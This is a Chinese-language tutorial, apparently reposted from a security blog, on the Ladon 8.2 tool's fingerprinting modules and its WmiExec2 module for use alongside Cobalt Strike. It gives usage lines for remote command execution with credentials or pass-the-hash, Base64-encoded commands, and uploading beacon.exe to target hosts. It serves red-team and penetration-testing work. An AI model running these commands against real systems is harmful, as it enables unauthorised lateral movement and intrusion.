〖教程〗Ladon WmiExec完美兼容Cobalt Strike
2021-05-15 18:10:00 Author: k8gege.org(查看原文) 阅读量:14 收藏

=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Ladon8.2更新功能

基于NTLM探测Windows版本信息

1
2
3
4
5
6
7
8
[+] WmiInfo 		(135)
[+] SmbInfo (445)
[+] WinrmInfo (5985/80/8080/443)
[+] MssqlInfo (1433)
[+] ExchangeInfo (443)
[+] RdpInfo (3389)
[+] WmiExec2 支持文件上传、Base64cmd解决CS解析空格引号的问题
[+] Ping 重新启用系统Ping检测存活主机(目标PS1版本检测不到)

LadonGUI 8.2 2021.5.15
[+]Base64 Unicdoe 主要用于WmiExec2或PowerShell命令的BASE64加密解密

WmiExec说明

WmiExec 只需135端口通过注册表回显,不像Impacket或其它工具还依赖445,不依赖PowerShell,适用于任意目标
WmiExec2 和WmiExec一样只需135端口通过注册表回显,但依赖PowerShell,无PowerShell的目标可能不适用

b64cmd和上版本的BypassUac一样,主要用于加密CMD命令,防止在CS下使用多参数CMD命令转义麻烦的问题

模块用法

1
2
3
4
5
6
7
8
9
10
Load WmiExec2
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd whoami
Ladon WmiExec2 host user pass b64cmd whoami
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe

批量IP(段)ip.txt、ip24.txt等请查看文档

WmiExec2执行

在Cobalt Strike的shell下执行wmiexec需要带空格引号参数时,CS转义有问题,使用正常CMD命令比较麻烦,所以我增加了个b64cmd参数便于在CS下使用(这个方法在几个月前的BypassUac里使用,很多人不知道为什么这样做,直接CMD命令不好吗,非要经过一步加密,当你要执行的CMD命令含有很多转义时你就知道了,得经过CS转义成CMD转义得到正常CMD很麻烦)。b64cmd命令可通过LadonGUI 8.2使用Base64Unicode加密生成

执行结果

Wmi探测信息

Winrm探测信息

Smb探测信息

Mssql探测信息

EnumMssql为探测SqlServer版本等信息

Exchange探测信息

Rdp探测信息

RdpInfo暂不支持内置,可使用INI方式批量

RdpInfo.ini

[Ladon]
exe=RdpInfo.exe
arg=$ip$
port=3389
log=true

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.2版本:K8小密圈


文章来源: http://k8gege.org/p/wmiexec2.html
如有侵权请联系:admin#unsafe.sh